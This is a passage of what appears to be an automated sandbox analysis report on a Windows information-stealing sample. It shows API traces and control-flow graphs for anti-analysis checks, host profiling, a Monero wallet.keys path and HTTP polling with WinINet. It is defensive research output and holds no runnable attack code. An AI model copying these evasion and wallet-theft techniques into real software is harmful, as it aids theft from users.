                        • GetProcAddress.KERNEL32(75AF0000,01899188), ref: 0101A641
                        • GetProcAddress.KERNEL32(75AF0000,0189CFC0), ref: 0101A659
                        • GetProcAddress.KERNEL32(75AF0000,0189CF78), ref: 0101A672
                        • GetProcAddress.KERNEL32(75D90000,01885B50), ref: 0101A693
                        • GetProcAddress.KERNEL32(6CFC0000,0189D080), ref: 0101A6B4
                        • GetProcAddress.KERNEL32(6CFC0000,01885BD0), ref: 0101A6CD
                        • GetProcAddress.KERNEL32(6CFC0000,0189CFA8), ref: 0101A6E5
                        • GetProcAddress.KERNEL32(6CFC0000,0189CFD8), ref: 0101A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 2bb53df6cdb39f958b8d5accb58a0486587db20279ca34fee1bf4cec30958e02
                        • Instruction ID: 49c03f442529e63270f1a11783e6ac5d64791f349e52215b94bba565ea7b234b
                        • Opcode Fuzzy Hash: 2bb53df6cdb39f958b8d5accb58a0486587db20279ca34fee1bf4cec30958e02
                        • Instruction Fuzzy Hash: 2A62FABD6C1240AFE778DFA8F98C96A3BF9F78C601714851AA60BC724CD6399441DF60

                        Control-flow Graph

                        control_flow_graph 1033 1006280-100630b call 101a7a0 call 10047b0 call 101a740 InternetOpenA StrCmpCA 1040 1006314-1006318 1033->1040 1041 100630d 1033->1041 1042 1006509-1006525 call 101a7a0 call 101a800 * 2 1040->1042 1043 100631e-1006342 InternetConnectA 1040->1043 1041->1040 1063 1006528-100652d 1042->1063 1044 1006348-100634c 1043->1044 1045 10064ff-1006503 InternetCloseHandle 1043->1045 1047 100635a 1044->1047 1048 100634e-1006358 1044->1048 1045->1042 1050 1006364-1006392 HttpOpenRequestA 1047->1050 1048->1050 1052 10064f5-10064f9 InternetCloseHandle 1050->1052 1053 1006398-100639c 1050->1053 1052->1045 1055 10063c5-1006405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 100639e-10063bf InternetSetOptionA 1053->1056 1058 1006407-1006427 call 101a740 call 101a800 * 2 1055->1058 1059 100642c-100644b call 1018940 1055->1059 1056->1055 1058->1063 1066 10064c9-10064e9 call 101a740 call 101a800 * 2 1059->1066 1067 100644d-1006454 1059->1067 1066->1063 1069 1006456-1006480 InternetReadFile 1067->1069 1070 10064c7-10064ef InternetCloseHandle 1067->1070 1074 1006482-1006489 1069->1074 1075 100648b 1069->1075 1070->1052 1074->1075 1079 100648d-10064c5 call 101a9b0 call 101a8a0 call 101a800 1074->1079 1075->1070 1079->1069
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • InternetOpenA.WININET(01020DFE,00000001,00000000,00000000,00000000), ref: 010062E1
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01006335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0189E020,00000000,00000000,00400100,00000000), ref: 01006385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 010063BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010063D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 010063FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0100646D
                        • InternetCloseHandle.WININET(00000000), ref: 010064EF
                        • InternetCloseHandle.WININET(00000000), ref: 010064F9
                        • InternetCloseHandle.WININET(00000000), ref: 01006503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: ffdea09d929f93a287769b07a56d7340327a78f9a55d325d347db6b54f801f57
                        • Instruction ID: 0eda038fa3473e69295d09ec349d5511447c5845cb697d53667ed3a50aa5a6d4
                        • Opcode Fuzzy Hash: ffdea09d929f93a287769b07a56d7340327a78f9a55d325d347db6b54f801f57
                        • Instruction Fuzzy Hash: A1718E75A00218EBEB25DFA4DC48BEE77B9FB44700F108198F64A6B1C4DBB56A85CF50

                        Control-flow Graph

                        control_flow_graph 1090 1015510-1015577 call 1015ad0 call 101a820 * 3 call 101a740 * 4 1106 101557c-1015583 1090->1106 1107 1015585-10155b6 call 101a820 call 101a7a0 call 1001590 call 10151f0 1106->1107 1108 10155d7-101564c call 101a740 * 2 call 1001590 call 10152c0 call 101a8a0 call 101a800 call 101aad0 StrCmpCA 1106->1108 1124 10155bb-10155d2 call 101a8a0 call 101a800 1107->1124 1133 1015693-10156a9 call 101aad0 StrCmpCA 1108->1133 1137 101564e-101568e call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1108->1137 1124->1133 1140 10157dc-1015844 call 101a8a0 call 101a820 * 2 call 1001670 call 101a800 * 4 call 1016560 call 1001550 1133->1140 1141 10156af-10156b6 1133->1141 1137->1133 1272 1015ac3-1015ac6 1140->1272 1144 10157da-101585f call 101aad0 StrCmpCA 1141->1144 1145 10156bc-10156c3 1141->1145 1165 1015991-10159f9 call 101a8a0 call 101a820 * 2 call 1001670 call 101a800 * 4 call 1016560 call 1001550 1144->1165 1166 1015865-101586c 1144->1166 1146 10156c5-1015719 call 101a820 call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1145->1146 1147 101571e-1015793 call 101a740 * 2 call 1001590 call 10152c0 call 101a8a0 call 101a800 call 101aad0 StrCmpCA 1145->1147 1146->1144 1147->1144 1250 1015795-10157d5 call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1147->1250 1165->1272 1167 1015872-1015879 1166->1167 1168 101598f-1015a14 call 101aad0 StrCmpCA 1166->1168 1174 10158d3-1015948 call 101a740 * 2 call 1001590 call 10152c0 call 101a8a0 call 101a800 call 101aad0 StrCmpCA 1167->1174 1175 101587b-10158ce call 101a820 call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1167->1175 1197 1015a16-1015a21 Sleep 1168->1197 1198 1015a28-1015a91 call 101a8a0 call 101a820 * 2 call 1001670 call 101a800 * 4 call 1016560 call 1001550 1168->1198 1174->1168 1276 101594a-101598a call 101a7a0 call 1001590 call 10151f0 call 101a8a0 call 101a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1144 1276->1168
                        APIs
                          • Part of subcall function 0101A820: lstrlen.KERNEL32(01004F05,?,?,01004F05,01020DDE), ref: 0101A82B
                          • Part of subcall function 0101A820: lstrcpy.KERNEL32(01020DDE,00000000), ref: 0101A885
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 010156A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015857
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015228
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 010152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015318
                          • Part of subcall function 010152C0: lstrlen.KERNEL32(00000000), ref: 0101532F
                          • Part of subcall function 010152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 01015364
                          • Part of subcall function 010152C0: lstrlen.KERNEL32(00000000), ref: 01015383
                          • Part of subcall function 010152C0: lstrlen.KERNEL32(00000000), ref: 010153AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0101578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 01015A0C
                        • Sleep.KERNEL32(0000EA60), ref: 01015A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 5bc990ccab0bcf98853f875e7e61f30f5731c27745c4a311ec4324339f4ae548
                        • Instruction ID: a8d6476ececad99e161e8d416f048ad6ced8f1cd83d3414f34c98f3c5733831d
                        • Opcode Fuzzy Hash: 5bc990ccab0bcf98853f875e7e61f30f5731c27745c4a311ec4324339f4ae548
                        • Instruction Fuzzy Hash: 43E15372A11145DBDB15FBA0ED95EED7378BF64210F408129E98757088EF386B0ECB91

                        Control-flow Graph

                        control_flow_graph 1301 10117a0-10117cd call 101aad0 StrCmpCA 1304 10117d7-10117f1 call 101aad0 1301->1304 1305 10117cf-10117d1 ExitProcess 1301->1305 1309 10117f4-10117f8 1304->1309 1310 10119c2-10119cd call 101a800 1309->1310 1311 10117fe-1011811 1309->1311 1313 1011817-101181a 1311->1313 1314 101199e-10119bd 1311->1314 1315 1011821-1011830 call 101a820 1313->1315 1316 1011849-1011858 call 101a820 1313->1316 1317 10118ad-10118be StrCmpCA 1313->1317 1318 10118cf-10118e0 StrCmpCA 1313->1318 1319 101198f-1011999 call 101a820 1313->1319 1320 10118f1-1011902 StrCmpCA 1313->1320 1321 1011951-1011962 StrCmpCA 1313->1321 1322 1011970-1011981 StrCmpCA 1313->1322 1323 1011913-1011924 StrCmpCA 1313->1323 1324 1011932-1011943 StrCmpCA 1313->1324 1325 1011835-1011844 call 101a820 1313->1325 1326 101185d-101186e StrCmpCA 1313->1326 1327 101187f-1011890 StrCmpCA 1313->1327 1314->1309 1315->1314 1316->1314 1329 10118c0-10118c3 1317->1329 1330 10118ca 1317->1330 1331 10118e2-10118e5 1318->1331 1332 10118ec 1318->1332 1319->1314 1333 1011904-1011907 1320->1333 1334 101190e 1320->1334 1339 1011964-1011967 1321->1339 1340 101196e 1321->1340 1342 1011983-1011986 1322->1342 1343 101198d 1322->1343 1335 1011930 1323->1335 1336 1011926-1011929 1323->1336 1337 1011945-1011948 1324->1337 1338 101194f 1324->1338 1325->1314 1348 1011870-1011873 1326->1348 1349 101187a 1326->1349 1350 1011892-101189c 1327->1350 1351 101189e-10118a1 1327->1351 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1314 1336->1335 1337->1338 1338->1314 1339->1340 1340->1314 1342->1343 1343->1314 1348->1349 1349->1314 1355 10118a8 1350->1355 1351->1355 1355->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 010117C5
                        • ExitProcess.KERNEL32 ref: 010117D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 0c608d7ff882dda0459ed5adffe3ab43d1b33b7b0301f7031ff4b3c2f2e7cfc0
                        • Instruction ID: 9ea770b596bf0efcb72bf52819ae0c5d725d4640b377faa98b554f323540abd1
                        • Opcode Fuzzy Hash: 0c608d7ff882dda0459ed5adffe3ab43d1b33b7b0301f7031ff4b3c2f2e7cfc0
                        • Instruction Fuzzy Hash: 56515CB4A00209EBDB18DFA5D948ABE77B6FF44704F00804DE996AB248D778E941CB61

                        Control-flow Graph

                        control_flow_graph 1356 1017500-101754a GetWindowsDirectoryA 1357 1017553-10175c7 GetVolumeInformationA call 1018d00 * 3 1356->1357 1358 101754c 1356->1358 1365 10175d8-10175df 1357->1365 1358->1357 1366 10175e1-10175fa call 1018d00 1365->1366 1367 10175fc-1017617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 1017619-1017626 call 101a740 1367->1369 1370 1017628-1017658 wsprintfA call 101a740 1367->1370 1377 101767e-101768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 01017542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0101757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0101760A
                        • wsprintfA.USER32 ref: 01017640
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 1898a885183eabf42791c5a480f2966122ccf3ecfc358f772836c6a1092a28f4
                        • Instruction ID: c6b2205e7594181cf8475de1c9b62fc1cf24534f9855ffbce9807feebf128240
                        • Opcode Fuzzy Hash: 1898a885183eabf42791c5a480f2966122ccf3ecfc358f772836c6a1092a28f4
                        • Instruction Fuzzy Hash: A04191B5D40248ABDB21DF94DC48BEEBBB8EF18704F004099F54A67284D7786B44CBA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018924E8), ref: 010198A1
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018922A8), ref: 010198BA
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01892308), ref: 010198D2
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923F8), ref: 010198EA
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923B0), ref: 01019903
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018992B8), ref: 0101991B
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018857D0), ref: 01019933
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01885770), ref: 0101994C
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923C8), ref: 01019964
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018922C0), ref: 0101997C
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018923E0), ref: 01019995
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01892398), ref: 010199AD
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,01885A10), ref: 010199C5
                          • Part of subcall function 01019860: GetProcAddress.KERNEL32(74DD0000,018924A0), ref: 010199DE
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 010011D0: ExitProcess.KERNEL32 ref: 01001211
                          • Part of subcall function 01001160: GetSystemInfo.KERNEL32(?), ref: 0100116A
                          • Part of subcall function 01001160: ExitProcess.KERNEL32 ref: 0100117E
                          • Part of subcall function 01001110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0100112B
                          • Part of subcall function 01001110: VirtualAllocExNuma.KERNEL32(00000000), ref: 01001132
                          • Part of subcall function 01001110: ExitProcess.KERNEL32 ref: 01001143
                          • Part of subcall function 01001220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0100123E
                          • Part of subcall function 01001220: __aulldiv.LIBCMT ref: 01001258
                          • Part of subcall function 01001220: __aulldiv.LIBCMT ref: 01001266
                          • Part of subcall function 01001220: ExitProcess.KERNEL32 ref: 01001294
                          • Part of subcall function 01016770: GetUserDefaultLangID.KERNEL32 ref: 01016774
                          • Part of subcall function 01001190: ExitProcess.KERNEL32 ref: 010011C6
                          • Part of subcall function 01017850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,010011B7), ref: 01017880
                          • Part of subcall function 01017850: RtlAllocateHeap.NTDLL(00000000), ref: 01017887
                          • Part of subcall function 01017850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0101789F
                          • Part of subcall function 010178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 01017910
                          • Part of subcall function 010178E0: RtlAllocateHeap.NTDLL(00000000), ref: 01017917
                          • Part of subcall function 010178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0101792F
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01016AE8
                        • CloseHandle.KERNEL32(00000000), ref: 01016AF9
                        • Sleep.KERNEL32(00001770), ref: 01016B04
                        • CloseHandle.KERNEL32(?,00000000,?,01899218,?,0102110C,?,00000000,?,01021110,?,00000000,01020AEF), ref: 01016B1A
                        • ExitProcess.KERNEL32 ref: 01016B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 417215afc5a8c3ebc86be3549f38e13bc4164e146c00a088f1d646007939a0f9
                        • Instruction ID: 12e71dcaa3d088fd9470af5eab702135a2a5402978b34473a216baf61c530cc7
                        • Opcode Fuzzy Hash: 417215afc5a8c3ebc86be3549f38e13bc4164e146c00a088f1d646007939a0f9
                        • Instruction Fuzzy Hash: 2C315E75A4020AABEB15F7F0EC55BEE7778AF24310F004518F583A7188DF786545CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 1001220-1001247 call 10189b0 GlobalMemoryStatusEx 1439 1001273-100127a 1436->1439 1440 1001249-1001271 call 101da00 * 2 1436->1440 1442 1001281-1001285 1439->1442 1440->1442 1443 1001287 1442->1443 1444 100129a-100129d 1442->1444 1446 1001292-1001294 ExitProcess 1443->1446 1447 1001289-1001290 1443->1447 1447->1444 1447->1446
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0100123E
                        • __aulldiv.LIBCMT ref: 01001258
                        • __aulldiv.LIBCMT ref: 01001266
                        • ExitProcess.KERNEL32 ref: 01001294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
